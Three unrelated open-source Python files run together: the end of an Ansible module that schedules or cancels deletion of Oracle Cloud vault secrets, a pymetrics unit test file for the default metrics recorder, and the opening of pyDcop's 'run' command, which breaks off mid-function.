ocid1.secret.oc1..xxxxxxEXAMPLExxxxxx action: schedule_secret_deletion """ RETURN = """ secret: description: - Details of the Secret resource acted upon by the current operation returned: on success type: complex contains: compartment_id: description: - The OCID of the compartment where you want to create the secret. returned: on success type: string sample: ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx current_version_number: description: - The version number of the secret version that's currently in use. returned: on success type: int sample: 56 defined_tags: description: - "Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see L(Resource Tags,https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm). Example: `{\\"Operations\\": {\\"CostCenter\\": \\"42\\"}}`" returned: on success type: dict sample: {'Operations': {'CostCenter': 'US'}} description: description: - A brief description of the secret. Avoid entering confidential information. returned: on success type: string sample: description_example freeform_tags: description: - "Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see L(Resource Tags,https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm). Example: `{\\"Department\\": \\"Finance\\"}`" returned: on success type: dict sample: {'Department': 'Finance'} id: description: - The OCID of the secret. 
returned: on success type: string sample: ocid1.resource.oc1..xxxxxxEXAMPLExxxxxx key_id: description: - The OCID of the master encryption key that is used to encrypt the secret. returned: on success type: string sample: ocid1.key.oc1..xxxxxxEXAMPLExxxxxx lifecycle_details: description: - Additional information about the current lifecycle state of the secret. returned: on success type: string sample: lifecycle_details_example lifecycle_state: description: - The current lifecycle state of the secret. returned: on success type: string sample: CREATING metadata: description: - Additional metadata that you can use to provide context about how to use the secret or during rotation or other administrative tasks. For example, for a secret that you use to connect to a database, the additional metadata might specify the connection endpoint and the connection string. Provide additional metadata as key-value pairs. returned: on success type: dict sample: {} secret_name: description: - The user-friendly name of the secret. Avoid entering confidential information. returned: on success type: string sample: secret_name_example secret_rules: description: - A list of rules that control how the secret is used and managed. returned: on success type: complex contains: rule_type: description: - The type of rule, which either controls when the secret contents expire or whether they can be reused. returned: on success type: string sample: SECRET_EXPIRY_RULE secret_version_expiry_interval: description: - A property indicating how long the secret contents will be considered valid, expressed in L(ISO 8601,https://en.wikipedia.org/wiki/ISO_8601#Time_intervals) format. The secret needs to be updated when the secret content expires. No enforcement mechanism exists at this time, but audit logs record the expiration on the appropriate date, according to the time interval specified in the rule. The timer resets after you update the secret contents. The minimum value is 1 day and the maximum value is 90 days for this property. Currently, only intervals expressed in days are supported. For example, pass `P3D` to have the secret version expire every 3 days. returned: on success type: string sample: secret_version_expiry_interval_example time_of_absolute_expiry: description: - "An optional property indicating the absolute time when this secret will expire, expressed in L(RFC 3339,https://tools.ietf.org/html/rfc3339) timestamp format. The minimum number of days from current time is 1 day and the maximum number of days from current time is 365 days. Example: `2019-04-03T21:10:29.600Z`" returned: on success type: string sample: 2019-04-03T21:10:29.600Z is_secret_content_retrieval_blocked_on_expiry: description: - A property indicating whether to block retrieval of the secret content, on expiry. The default is false. If the secret has already expired and you would like to retrieve the secret contents, you need to edit the secret rule to disable this property, to allow reading the secret content. returned: on success type: bool sample: true is_enforced_on_deleted_secret_versions: description: - A property indicating whether the rule is applied even if the secret version with the content you are trying to reuse was deleted. returned: on success type: bool sample: true time_created: description: - "A property indicating when the secret was created, expressed in L(RFC 3339,https://tools.ietf.org/html/rfc3339) timestamp format. 
Example: `2019-04-03T21:10:29.600Z`" returned: on success type: string sample: 2019-04-03T21:10:29.600Z time_of_current_version_expiry: description: - "An optional property indicating when the current secret version will expire, expressed in L(RFC 3339,https://tools.ietf.org/html/rfc3339) timestamp format. Example: `2019-04-03T21:10:29.600Z`" returned: on success type: string sample: 2019-04-03T21:10:29.600Z time_of_deletion: description: - "An optional property indicating when to delete the secret, expressed in L(RFC 3339,https://tools.ietf.org/html/rfc3339) timestamp format. Example: `2019-04-03T21:10:29.600Z`" returned: on success type: string sample: 2019-04-03T21:10:29.600Z vault_id: description: - The OCID of the vault where the secret exists. returned: on success type: string sample: ocid1.vault.oc1..xxxxxxEXAMPLExxxxxx sample: { "compartment_id": "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx", "current_version_number": 56, "defined_tags": {'Operations': {'CostCenter': 'US'}}, "description": "description_example", "freeform_tags": {'Department': 'Finance'}, "id": "ocid1.resource.oc1..xxxxxxEXAMPLExxxxxx", "key_id": "ocid1.key.oc1..xxxxxxEXAMPLExxxxxx", "lifecycle_details": "lifecycle_details_example", "lifecycle_state": "CREATING", "metadata": {}, "secret_name": "secret_name_example", "secret_rules": [{ "rule_type": "SECRET_EXPIRY_RULE", "secret_version_expiry_interval": "secret_version_expiry_interval_example", "time_of_absolute_expiry": "2019-04-03T21:10:29.600Z", "is_secret_content_retrieval_blocked_on_expiry": true, "is_enforced_on_deleted_secret_versions": true }], "time_created": "2019-04-03T21:10:29.600Z", "time_of_current_version_expiry": "2019-04-03T21:10:29.600Z", "time_of_deletion": "2019-04-03T21:10:29.600Z", "vault_id": "ocid1.vault.oc1..xxxxxxEXAMPLExxxxxx" } """ from ansible.module_utils.basic import AnsibleModule from ansible_collections.oracle.oci.plugins.module_utils import ( oci_common_utils, oci_wait_utils, ) from ansible_collections.oracle.oci.plugins.module_utils.oci_resource_utils import ( OCIActionsHelperBase, get_custom_class, ) try: from oci.vault import VaultsClient from oci.vault.models import ScheduleSecretDeletionDetails HAS_OCI_PY_SDK = True except ImportError: HAS_OCI_PY_SDK = False class SecretActionsHelperGen(OCIActionsHelperBase): """ Supported actions: cancel_secret_deletion schedule_secret_deletion """ @staticmethod def get_module_resource_id_param(): return "secret_id" def get_module_resource_id(self): return self.module.params.get("secret_id") def get_get_fn(self): return self.client.get_secret def get_resource(self): return oci_common_utils.call_with_backoff( self.client.get_secret, secret_id=self.module.params.get("secret_id"), ) def cancel_secret_deletion(self): return oci_wait_utils.call_and_wait( call_fn=self.client.cancel_secret_deletion, call_fn_args=(), call_fn_kwargs=dict(secret_id=self.module.params.get("secret_id"),), waiter_type=oci_wait_utils.NONE_WAITER_KEY, operation="{0}_{1}".format( self.module.params.get("action").upper(), oci_common_utils.ACTION_OPERATION_KEY, ), waiter_client=self.get_waiter_client(), resource_helper=self, wait_for_states=self.get_action_desired_states( self.module.params.get("action") ), ) def schedule_secret_deletion(self): action_details = oci_common_utils.convert_input_data_to_model_class( self.module.params, ScheduleSecretDeletionDetails ) return oci_wait_utils.call_and_wait( call_fn=self.client.schedule_secret_deletion, call_fn_args=(), call_fn_kwargs=dict( secret_id=self.module.params.get("secret_id"), 
schedule_secret_deletion_details=action_details, ), waiter_type=oci_wait_utils.NONE_WAITER_KEY, operation="{0}_{1}".format( self.module.params.get("action").upper(), oci_common_utils.ACTION_OPERATION_KEY, ), waiter_client=self.get_waiter_client(), resource_helper=self, wait_for_states=self.get_action_desired_states( self.module.params.get("action") ), ) SecretActionsHelperCustom = get_custom_class("SecretActionsHelperCustom") class ResourceHelper(SecretActionsHelperCustom, SecretActionsHelperGen): pass def main(): module_args = oci_common_utils.get_common_arg_spec( supports_create=False, supports_wait=False ) module_args.update( dict( secret_id=dict(aliases=["id"], type="str", required=True), time_of_deletion=dict(type="str"), action=dict( type="str", required=True, choices=["cancel_secret_deletion", "schedule_secret_deletion"], ), ) ) module = AnsibleModule(argument_spec=module_args, supports_check_mode=True) if not HAS_OCI_PY_SDK: module.fail_json(msg="oci python sdk required for this module.") resource_helper = ResourceHelper( module=module, resource_type="secret", service_client_class=VaultsClient, namespace="vault", ) result = resource_helper.perform_action(module.params.get("action")) module.exit_json(**result) if __name__ == "__main__": main() tests/unit/recorders/test_default.py from __future__ import ( absolute_import, unicode_literals, ) import time from typing import ( Any, Dict, Optional, cast, ) from conformity import fields from conformity.error import ValidationError import freezegun import mock import pytest import six from pymetrics.instruments import ( Timer, TimerResolution, ) from pymetrics.publishers.base import MetricsPublisher from pymetrics.publishers.null import NullPublisher from pymetrics.recorders.base import MetricsRecorder from pymetrics.recorders.default import DefaultMetricsRecorder mock_publisher = mock.MagicMock(spec=MetricsPublisher) mock_publisher_extra = mock.MagicMock(spec=MetricsPublisher) # noinspection PyAbstractClass @fields.ClassConfigurationSchema.provider( fields.Dictionary({}), ) class MockPublisher(MetricsPublisher): def __new__(cls, *args, **kwargs): return mock_publisher # noinspection PyAbstractClass @fields.ClassConfigurationSchema.provider( fields.Dictionary({}), ) class MockPublisherExtra(MetricsPublisher): def __new__(cls, *args, **kwargs): return mock_publisher_extra class FakeImproperlyConfigured(Exception): pass # noinspection PyProtectedMember class TestDefaultMetricsRecorderConfiguration(object): # noinspection PyMethodMayBeStatic def teardown_method(self, _method): DefaultMetricsRecorder.attempted_django_exception_import = False DefaultMetricsRecorder.django_settings = None DefaultMetricsRecorder.DjangoImproperlyConfigured = DefaultMetricsRecorder.StubImproperlyConfigured def test_config_no_config(self): recorder = DefaultMetricsRecorder('me') assert recorder.is_configured is False def test_config_explicit(self): recorder = DefaultMetricsRecorder('me', config={ 'version': 2, 'publishers': [ {'path': 'tests.unit.recorders.test_default:MockPublisher'}, ], }) assert recorder.is_configured is True assert recorder._configuration is not None assert len(recorder._configuration.publishers) == 1 assert recorder._configuration.publishers[0] is mock_publisher # re-config should do nothing recorder.configure({'bad_config': 'bad_value'}) def test_config_django_causes_conformity_import_error(self): django_exceptions = mock.MagicMock() django_exceptions.ImproperlyConfigured = FakeImproperlyConfigured django_conf = mock.MagicMock() e = 
ValidationError( "Invalid keyword arguments:\n - middleware.0.path: ImportError: cannot import name 'baz' from 'foo.bar' " ) if six.PY2: django_conf.settings.__nonzero__.side_effect = e else: django_conf.settings.__bool__.side_effect = e with mock.patch.dict('sys.modules', { 'django': mock.MagicMock(), 'django.conf': django_conf, 'django.core': mock.MagicMock(), 'django.core.exceptions': django_exceptions, }): recorder = DefaultMetricsRecorder('me') assert recorder.is_configured is False def test_config_django_causes_conformity_other_error(self): django_exceptions = mock.MagicMock() django_exceptions.ImproperlyConfigured = FakeImproperlyConfigured django_conf = mock.MagicMock() e = ValidationError( "Invalid keyword arguments:\n - middleware.0.path: Some other error that isn't an import error " ) if six.PY2: django_conf.settings.__nonzero__.side_effect = e else: django_conf.settings.__bool__.side_effect = e with mock.patch.dict('sys.modules', { 'django': mock.MagicMock(), 'django.conf': django_conf, 'django.core': mock.MagicMock(), 'django.core.exceptions': django_exceptions, }), pytest.raises(ValidationError) as error_context: DefaultMetricsRecorder('me') assert error_context.value is e def test_config_django_available_but_settings_broken1(self): django_exceptions = mock.MagicMock() django_exceptions.ImproperlyConfigured = FakeImproperlyConfigured django_conf = mock.MagicMock() if six.PY2: django_conf.settings.__nonzero__.side_effect = FakeImproperlyConfigured else: django_conf.settings.__bool__.side_effect = FakeImproperlyConfigured with mock.patch.dict('sys.modules', { 'django': mock.MagicMock(), 'django.conf': django_conf, 'django.core': mock.MagicMock(), 'django.core.exceptions': django_exceptions, }): recorder = DefaultMetricsRecorder('me') assert recorder.is_configured is False def test_config_django_available_but_settings_false(self): django_exceptions = mock.MagicMock() django_exceptions.ImproperlyConfigured = FakeImproperlyConfigured django_conf = mock.MagicMock() if six.PY2: django_conf.settings.__nonzero__.return_value = False else: django_conf.settings.__bool__.return_value = False with mock.patch.dict('sys.modules', { 'django': mock.MagicMock(), 'django.conf': django_conf, 'django.core': mock.MagicMock(), 'django.core.exceptions': django_exceptions, }): recorder = DefaultMetricsRecorder('me') assert recorder.is_configured is False def test_config_django_available_but_settings_broken2(self): django_exceptions = mock.MagicMock() django_exceptions.ImproperlyConfigured = FakeImproperlyConfigured class S(object): def __getattr__(self, item): raise FakeImproperlyConfigured() django_conf = mock.MagicMock() django_conf.settings = S() with mock.patch.dict('sys.modules', { 'django': mock.MagicMock(), 'django.conf': django_conf, 'django.core': mock.MagicMock(), 'django.core.exceptions': django_exceptions, }): recorder = DefaultMetricsRecorder('me') assert recorder.is_configured is False def test_config_django_available_but_settings_missing(self): django_exceptions = mock.MagicMock() django_exceptions.ImproperlyConfigured = FakeImproperlyConfigured django_conf = mock.MagicMock() django_conf.settings.DEBUG = True del django_conf.settings.METRICS del django_conf.settings.SOA_SERVER_SETTINGS with mock.patch.dict('sys.modules', { 'django': mock.MagicMock(), 'django.conf': django_conf, 'django.core': mock.MagicMock(), 'django.core.exceptions': django_exceptions, }): recorder = DefaultMetricsRecorder('me') assert recorder.is_configured is False def 
test_config_django_available_main_settings_preferred(self): django_exceptions = mock.MagicMock() django_exceptions.ImproperlyConfigured = FakeImproperlyConfigured django_conf = mock.MagicMock() django_conf.settings.DEBUG = True django_conf.settings.METRICS = { 'version': 2, 'publishers': [ {'path': 'tests.unit.recorders.test_default:MockPublisherExtra'}, ] } django_conf.settings.SOA_SERVER_SETTINGS = {'metrics': {'kwargs': {'config': { 'version': 2, 'publishers': [ {'path': 'tests.unit.recorders.test_default:MockPublisher'}, ] }}}} with mock.patch.dict('sys.modules', { 'django': mock.MagicMock(), 'django.conf': django_conf, 'django.core': mock.MagicMock(), 'django.core.exceptions': django_exceptions, }): recorder = DefaultMetricsRecorder('me') assert recorder.is_configured is True assert recorder._configuration is not None assert len(recorder._configuration.publishers) == 1 assert recorder._configuration.publishers[0] is mock_publisher_extra assert recorder._configuration.version == 2 recorder = DefaultMetricsRecorder('you') assert recorder.is_configured is True assert recorder._configuration is not None assert len(recorder._configuration.publishers) == 1 assert recorder._configuration.publishers[0] is mock_publisher_extra assert recorder._configuration.version == 2 def test_config_django_available_soa_settings_used(self): django_exceptions = mock.MagicMock() django_exceptions.ImproperlyConfigured = FakeImproperlyConfigured django_conf = mock.MagicMock() django_conf.settings.DEBUG = True del django_conf.settings.METRICS django_conf.settings.SOA_SERVER_SETTINGS = {'metrics': {'kwargs': {'config': { 'version': 2, 'publishers': [ {'path': 'tests.unit.recorders.test_default:MockPublisher'}, ] }}}} with mock.patch.dict('sys.modules', { 'django': mock.MagicMock(), 'django.conf': django_conf, 'django.core': mock.MagicMock(), 'django.core.exceptions': django_exceptions, }): recorder = DefaultMetricsRecorder('me') assert recorder.is_configured is True assert recorder._configuration is not None assert len(recorder._configuration.publishers) == 1 assert recorder._configuration.publishers[0] is mock_publisher assert recorder._configuration.version == 2 recorder = DefaultMetricsRecorder('you') assert recorder.is_configured is True assert recorder._configuration is not None assert len(recorder._configuration.publishers) == 1 assert recorder._configuration.publishers[0] is mock_publisher assert recorder._configuration.version == 2 # noinspection PyProtectedMember class TestConfigurationWithConformity(object): def test_no_prefix_no_config(self): field = fields.ClassConfigurationSchema(base_class=MetricsRecorder) config = { 'path': 'pymetrics.recorders.default.DefaultMetricsRecorder', 'kwargs': {}, } # type: Dict[six.text_type, Any] assert field.errors(config) config = { 'path': 'pymetrics.recorders.default.DefaultMetricsRecorder', 'kwargs': { 'prefix': None, }, } assert not field.errors(config) recorder = config['object'](**config['kwargs']) assert isinstance(recorder, DefaultMetricsRecorder) assert recorder.prefix is None assert recorder._configuration is None def test_prefix_no_config(self): field = fields.ClassConfigurationSchema(base_class=MetricsRecorder) config = { 'path': 'pymetrics.recorders.default.DefaultMetricsRecorder', 'kwargs': { 'prefix': 'hello.world', }, } # type: Dict[six.text_type, Any] assert not field.errors(config) recorder = config['object'](**config['kwargs']) assert isinstance(recorder, DefaultMetricsRecorder) assert recorder.prefix == 'hello.world' assert recorder._configuration 
is None def test_prefix_with_config(self): field = fields.ClassConfigurationSchema(base_class=MetricsRecorder) config = { 'path': 'pymetrics.recorders.default.DefaultMetricsRecorder', 'kwargs': { 'prefix': 'goodbye.mars', 'config': { 'version': 2, 'publishers': [ {'path': 'pymetrics.publishers.null.NullPublisher'} ], }, }, } # type: Dict[six.text_type, Any] assert not field.errors(config) recorder = config['object'](**config['kwargs']) assert isinstance(recorder, DefaultMetricsRecorder) assert recorder.prefix == 'goodbye.mars' assert recorder._configuration is not None assert len(recorder._configuration.publishers) == 1 assert isinstance(recorder._configuration.publishers[0], NullPublisher) # noinspection PyProtectedMember class TestDefaultMetricsRecorder(object): @staticmethod def _recorder(prefix, meta=False): # type: (Optional[six.text_type], bool) -> DefaultMetricsRecorder return DefaultMetricsRecorder(prefix, config={ 'version': 2, 'enable_meta_metrics': meta, 'publishers': [ {'path': 'tests.unit.recorders.test_default:MockPublisher'}, ], }) def test_counter(self): recorder = self._recorder('me') recorder.counter('foo.bar').increment() recorder.counter('foo.bar').increment() recorder.counter('foo.bar').increment() recorder.counter('foo.bar', tag_1='value_1').increment() recorder.counter('foo.bar', tag_1='value_1').increment() recorder.counter('baz.qux').increment() assert recorder.unpublished_metrics_count == 3 metrics = recorder.get_all_metrics() assert len(metrics) == 3 for metric in metrics: if metric.name == 'me.foo.bar': if metric.value == 3: assert not metric.tags else: assert metric.value == 2 assert metric.tags['tag_1'] == 'value_1' else: assert metric.name == 'me.baz.qux' assert not metric.tags assert metric.value == 1 def test_gauge(self): recorder = self._recorder('you') recorder.gauge('foo.bar') recorder.gauge('foo.bar').set(3) recorder.gauge('baz.qux').set(2) recorder.gauge('baz.qux', initial_value=1, tag_2='value_2') assert recorder.unpublished_metrics_count == 4 metrics = recorder.get_all_metrics() assert len(metrics) == 4 possible_foo = {0, 3} for metric in metrics: if metric.name == 'you.foo.bar': assert not metric.tags assert metric.value in possible_foo possible_foo -= {metric.value} elif metric.name == 'you.baz.qux' and not metric.tags: assert metric.value == 2 elif metric.name == 'you.baz.qux': assert metric.tags['tag_2'] == 'value_2' assert metric.value == 1 else: raise AssertionError(metric.name) def test_histogram(self): recorder = self._recorder(None, meta=True) recorder.histogram('foo.bar').set(4) recorder.histogram('foo.bar') recorder.histogram('baz.qux').set(17) recorder.histogram('baz.qux', initial_value=5, tag_3='value_3') assert recorder.unpublished_metrics_count == 4 metrics = recorder.get_all_metrics() assert len(metrics) == 5 possible_foo = {0, 4} for metric in metrics: if metric.name == 'foo.bar': assert not metric.tags assert metric.value in possible_foo possible_foo -= {metric.value} elif metric.name == 'baz.qux' and not metric.tags: assert metric.value == 17 elif metric.name == 'baz.qux': assert metric.tags['tag_3'] == 'value_3' assert metric.value == 5 elif metric.name == 'pymetrics.meta.recorder.get_all_metrics': assert metric.value is not None assert metric.value > 0 assert cast(Timer, metric).resolution == TimerResolution.MICROSECONDS else: raise AssertionError(metric.name) assert metrics[0].name == 'pymetrics.meta.recorder.get_all_metrics' def test_timer(self): recorder = self._recorder('us') recorder.timer('foo.bar') 
recorder.timer('foo.bar').set(1) recorder.timer('foo.bar', resolution=TimerResolution.MICROSECONDS).set(4) recorder.timer('baz.qux') recorder.timer('baz.qux', force_new=True).set(2) recorder.timer('lorem') recorder.timer('lorem', tag_4='value_4') recorder.timer('lorem', tag_4='value_4').set(3) assert recorder.unpublished_metrics_count == 6 metrics = recorder.get_all_metrics() assert len(metrics) == 4 possible_foo = {1, 4} for metric in metrics: if metric.name == 'us.foo.bar': assert not metric.tags assert metric.value in possible_foo possible_foo -= {metric.value} if metric.value == 4: assert cast(Timer, metric).resolution == TimerResolution.MICROSECONDS else: assert cast(Timer, metric).resolution == TimerResolution.MILLISECONDS elif metric.name == 'us.baz.qux': assert metric.value == 2 assert not metric.tags elif metric.name == 'us.lorem': assert metric.tags['tag_4'] == 'value_4' assert metric.value == 3 else: raise AssertionError(metric.name) assert len(recorder.timers) == 4 assert len(recorder.timers['us.foo.bar']) == 2 assert len(recorder.timers['us.baz.qux']) == 2 assert len(recorder.timers['us.lorem']) == 1 assert len(recorder.timers[next(k for k in recorder.timers.keys() if k.startswith('us.lorem#'))]) == 1 assert recorder.get_all_metrics() == recorder.get_all_metrics() recorder.clear(only_published=True) assert recorder.unpublished_metrics_count == 2 assert recorder.get_all_metrics() == [] assert len(recorder.timers) == 2 assert len(recorder.timers['us.baz.qux']) == 1 assert len(recorder.timers['us.lorem']) == 1 recorder.clear() assert recorder.unpublished_metrics_count == 0 assert recorder.get_all_metrics() == [] assert len(recorder.timers) == 0 @mock.patch('pymetrics.recorders.default.publish_metrics') def test_publish_no_config(self, mock_publish_metrics): recorder = DefaultMetricsRecorder('oops') recorder.counter('foo.bar').increment() recorder.timer('baz.qux').set(15) recorder.publish_all() assert recorder.get_all_metrics() == [] assert mock_publish_metrics.call_count == 0 @mock.patch('pymetrics.recorders.default.publish_metrics') def test_publish_with_config(self, mock_publish_metrics): recorder = self._recorder('oops') recorder.counter('foo.bar').increment() recorder.timer('baz.qux').set(15) recorder.publish_all() assert recorder.get_all_metrics() == [] assert mock_publish_metrics.call_count == 1 args, _ = mock_publish_metrics.call_args assert len(args[0]) == 2 assert args[0][0].name == 'oops.foo.bar' assert args[0][0].value == 1 assert args[0][1].name == 'oops.baz.qux' assert args[0][1].value == 15 assert recorder._configuration is not None assert args[1] == recorder._configuration def test_publish_if_full_or_old(self): recorder = self._recorder('no') with mock.patch.object(recorder, 'publish_all') as mock_publish, \ freezegun.freeze_time() as frozen_time: def se(): recorder._last_publish_timestamp = time.time() mock_publish.side_effect = se recorder.unpublished_metrics_count = 1 recorder.publish_if_full_or_old() mock_publish.assert_called_once_with() mock_publish.reset_mock() recorder.publish_if_full_or_old() recorder.publish_if_full_or_old() recorder.publish_if_full_or_old() recorder.publish_if_full_or_old() assert mock_publish.call_count == 0 recorder.unpublished_metrics_count = 18 recorder.publish_if_full_or_old() assert mock_publish.call_count == 0 recorder.unpublished_metrics_count = 19 recorder.publish_if_full_or_old() mock_publish.assert_called_once_with() mock_publish.reset_mock() recorder.unpublished_metrics_count = 1 frozen_time.tick(9) 
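# Assumption drawn from the assertions that follow: the default "old" threshold
# appears to be 10 seconds, so after only 9 seconds the next call should not
# publish, and one more second should trigger a publish.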
recorder.publish_if_full_or_old() assert mock_publish.call_count == 0 frozen_time.tick(1) recorder.publish_if_full_or_old() mock_publish.assert_called_once_with() mock_publish.reset_mock() recorder.publish_if_full_or_old() recorder.publish_if_full_or_old() assert mock_publish.call_count == 0 frozen_time.tick(13) recorder.publish_if_full_or_old(max_age=14) assert mock_publish.call_count == 0 frozen_time.tick(1) recorder.publish_if_full_or_old() mock_publish.assert_called_once_with() mock_publish.reset_mock() def test_throttled_publish_all(self): recorder = self._recorder('no') with mock.patch.object(recorder, 'publish_all') as mock_publish, \ freezegun.freeze_time() as frozen_time: def se(): recorder._last_publish_timestamp = time.time() mock_publish.side_effect = se recorder.throttled_publish_all() mock_publish.assert_called_once_with() mock_publish.reset_mock() recorder.throttled_publish_all() recorder.throttled_publish_all() recorder.throttled_publish_all() recorder.throttled_publish_all() assert mock_publish.call_count == 0 frozen_time.tick(9) recorder.throttled_publish_all() assert mock_publish.call_count == 0 frozen_time.tick(1) recorder.throttled_publish_all() mock_publish.assert_called_once_with() mock_publish.reset_mock() recorder.throttled_publish_all() recorder.throttled_publish_all() assert mock_publish.call_count == 0 frozen_time.tick(13) recorder.throttled_publish_all(14) assert mock_publish.call_count == 0 frozen_time.tick(1) recorder.throttled_publish_all() mock_publish.assert_called_once_with() mock_publish.reset_mock() rpgoldman/pyDcop # BSD-3-Clause License # # Copyright 2017 Orange # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # 1. Redistributions of source code must retain the above copyright notice, # this list of conditions and the following disclaimer. # # 2. Redistributions in binary form must reproduce the above copyright notice, # this list of conditions and the following disclaimer in the documentation # and/or other materials provided with the distribution. # # 3. Neither the name of the copyright holder nor the names of its contributors # may be used to endorse or promote products derived from this software # without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE # LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR # CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF # SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN # CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. """ .. _pydcop_commands_run: pydcop run ========== Running a (dynamic) DCOP Synopsis -------- :: pydcop run --algo [--algo_params ] [--distribution ] [--replication_method ] [--ktarget ] [--mode ] [--collect_on ] [--period

]
           [--run_metrics ] [--end_metrics ]
           --scenario

Description
-----------

The ``run`` command runs a DCOP; it is generally used for dynamic DCOPs,
where various events can occur during the life of the system.

Most options are basically the same as the options of the
:ref:`pydcop_commands_solve` command. The main differences are the optional
options for resilient DCOPs, ``--ktarget`` and ``--replication_method``, and
the scenario that contains events. See :ref:`usage_file_formats_scenario`
for information on the scenario file format.

When using the ``run`` command, you should use the global ``--timeout``
option. Note that the ``--timeout`` is used as a timeout for the solve
process only. Bootstrapping the system and gathering metrics take additional
time, which is not accounted for in the timeout. This means that the run
command may take more time to return than the time set with the global
``--timeout`` option. You can always stop the process manually with
``CTRL+C``. Here again, the system may take a few seconds to stop.

See Also
--------

**Commands:** :ref:`pydcop_commands_solve`, :ref:`pydcop_commands_distribute`

**Tutorials:** :ref:`tutorials_analysing_results` and
:ref:`tutorials_dynamic_dcops`

Options
-------

``--algo `` / ``-a ``
  Name of the dcop algorithm, e.g. 'maxsum', 'dpop', 'dsa', etc.

``--algo_params `` / ``-p ``
  Optional parameter for the DCOP algorithm, given as string ``name:value``.
  This option may be used multiple times to set several parameters.
  Available parameters depend on the algorithm, check
  :ref:`algorithms documentation`.

``--distribution `` / ``-d ``
  Either a :ref:`distribution algorithm` (``oneagent``, ``adhoc``,
  ``ilp_fgdp``, etc.) or the path to a yaml file containing the distribution
  (see :ref:`yaml format`). If not given, ``oneagent`` is used.

``--mode `` / ``-m``
  Indicates whether agents must be run as threads (default) or processes;
  either ``thread`` or ``process``.

``--collect_on `` / ``-c``
  Metric collection mode, one of ``value_change``, ``cycle_change``,
  ``period``. See :ref:`tutorials_analysing_results` for details.

``--period

`` When using ``--collect_on period``, the period in second for metrics collection. See :ref:`tutorials_analysing_results` for details. ``--run_metrics `` File to store store metrics. See :ref:`tutorials_analysing_results` for details. ``--replication_method `` Optional replication method. Defaults to ``replication method``, which is the only replication method currently implemented in pyDCOP. ``--ktarget `` Optional replication level (aka number of replicas for each computation). Defaults to 3 ``--scenario `` Path to the files containing the scenario. :ref:`yaml definition` for the format. ```` One or several paths to the files containing the dcop. If several paths are given, their content is concatenated as used a the :ref:`yaml definition` for the DCOP. Examples -------- Runnig the DCOP from the file ``dcop.yaml``, using the initial ditribution from ``dist.yaml`` :: pydcop -v 2 run --algo dsa \\ --distribution dist.yaml \\ --scenario scenario.yaml \\ --collect_on period \\ --period 1 \\ --run_metrics run_dcop.csv \\ dcop.yaml """ import logging import multiprocessing import sys import threading import traceback from queue import Queue from threading import Thread from pydcop.algorithms import list_available_algorithms from pydcop.commands._utils import ( _error, prepare_metrics_files, _load_modules, build_algo_def, collect_tread, dump_results, ) from pydcop.dcop.dcop import filter_dcop from pydcop.dcop.yamldcop import load_dcop_from_file, load_scenario_from_file from pydcop.distribution.yamlformat import load_dist_from_file from pydcop.infrastructure.run import run_local_thread_dcop, run_local_process_dcop logger = logging.getLogger("pydcop.cli.run") def set_parser(subparsers): algorithms = list_available_algorithms() logger.debug("Available DCOP algorithms %s", algorithms) parser = subparsers.add_parser("run", help="run a dcop") parser.set_defaults(func=run_cmd) parser.set_defaults(on_timeout=on_timeout) parser.set_defaults(on_force_exit=on_force_exit) parser.add_argument("dcop_files", type=str, nargs="+", help="dcop file") parser.add_argument( "-a", "--algo", required=True, choices=algorithms, help="algorithm for solving the dcop", ) parser.add_argument( "-p", "--algo_params", type=str, action="append", help="Optional parameters for the algorithm, given as " "name:value. Use this option several times " "to set several parameters.", ) parser.add_argument( "-d", "--distribution", required=True, help="distribution of the computations on agents, " "as a yaml file ", ) # FIXME: allow loading replica dist from file and pass it to the # orchestrator # parser.add_argument('-r', '--replica_dist', # help='distribution of the computations replicas on ' # 'agents, as a yaml file ') parser.add_argument( "-r", "--replication_method", default="dist_ucs_hostingcosts", help="replication method", ) parser.add_argument( "-k", "--ktarget", default=3, type=int, help="Requested resiliency level" ) parser.add_argument("-s", "--scenario", required=True, help="scenario file") parser.add_argument( "-m", "--mode", default="thread", choices=["thread", "process"], help="run agents as threads or processes", ) # Statistics collection arguments: parser.add_argument( "-c", "--collect_on", choices=["value_change", "cycle_change", "period"], default="value_change", help='When should a "new" assignment be observed', ) parser.add_argument( "--period", type=float, default=None, help="Period for collecting metrics. only available " "when using --collect_on period. 
Defaults to 1 " "second if not specified", ) parser.add_argument( "--run_metrics", type=str, default=None, help="Use this option to regularly store the data " "in a csv file.", ) parser.add_argument( "--end_metrics", type=str, default=None, help="Use this option to append the metrics of the " "end of the run to a csv file.", ) # TODO : remove, this should no be at this level parser.add_argument( "--infinity", "-i", default=float("inf"), type=float, help="Argument to determine the value used for " "infinity in case of hard constraints, " "for algorithms that do not use symbolic " "infinity. Defaults to 10 000", ) dcop = None orchestrator = None INFINITY = None collect_on = None run_metrics = None end_metrics = None timeout_stopped = False output_file = None DISTRIBUTION_METHODS = ["oneagent", "adhoc", "ilp_fgdp", "heur_comhost", "oilp_secp_fgdp", "gh_secp_fgdp", "gh_secp_cgdp", "oilp_cgdp", "gh_cgdp"] def run_cmd(args, timer=None, timeout=None): logger.debug('dcop command "run" with arguments {}'.format(args)) global INFINITY, collect_on, output_file INFINITY = args.infinity collect_on = args.collect_on output_file = args.output period = None if 